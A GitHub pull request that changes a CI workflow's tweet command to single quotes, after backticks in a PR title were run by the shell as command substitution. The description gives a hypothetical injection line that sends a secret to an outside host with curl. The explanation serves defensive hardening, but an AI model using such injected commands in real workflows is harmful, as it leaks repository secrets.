Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Chore: Use non-interpolating single quotes in Tweet action #74

Merged
merged 1 commit into from Dec 29, 2020
Merged

Chore: Use non-interpolating single quotes in Tweet action #74

merged 1 commit into from Dec 29, 2020

Conversation

btmills
Copy link
Member

@btmills btmills commented Dec 28, 2020
edited

RFC #73 originally included backticks around `only`. The automated tweet omitted "only" and its backticks. I realized that the run action command was using double quotes, so the backticks from the PR title were being interpreted by the shell as command substitution. Using single quotes disables any interpolation.

Thankfully only contributors can trigger the automated tweet by labeling or merging an RFC, and we'd notice something like curl example.com?secret=$SECRET, so this isn't really a security issue.

@btmills
Chore: Use non-interpolating single quotes in Tweet action
395eaf7 
RFC #73 originally included backticks around <code>`only`</code>. The
automated tweet omitted "only" and its backticks. I realized that the
`run` action command was using double quotes, so the backticks from the
PR title were being interpreted by the shell as command substitution.
Using single quotes disables any interpolation.

Thankfully only contributors can trigger the automated tweet by labeling
or merging an RFC, and we'd notice something like `curl
example.com?secret=$SECRET`, so this isn't really a security issue.
@btmills btmills added bug Something isn't working meta Relates to the RFC process itself labels Dec 28, 2020
aladdin-add
aladdin-add approved these changes Dec 28, 2020
View reviewed changes
Copy link
Member

@aladdin-add aladdin-add left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lgtm!👍

@nzakas nzakas merged commit 698ed46 into master Dec 29, 2020
@nzakas nzakas deleted the tweet-quote-backticks branch December 29, 2020 18:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@nzakas nzakas nzakas approved these changes

@aladdin-add aladdin-add aladdin-add approved these changes

Assignees
No one assigned
Labels
bug Something isn't working meta Relates to the RFC process itself
Projects
None yet
Milestone
No milestone
3 participants
@btmills @nzakas @aladdin-add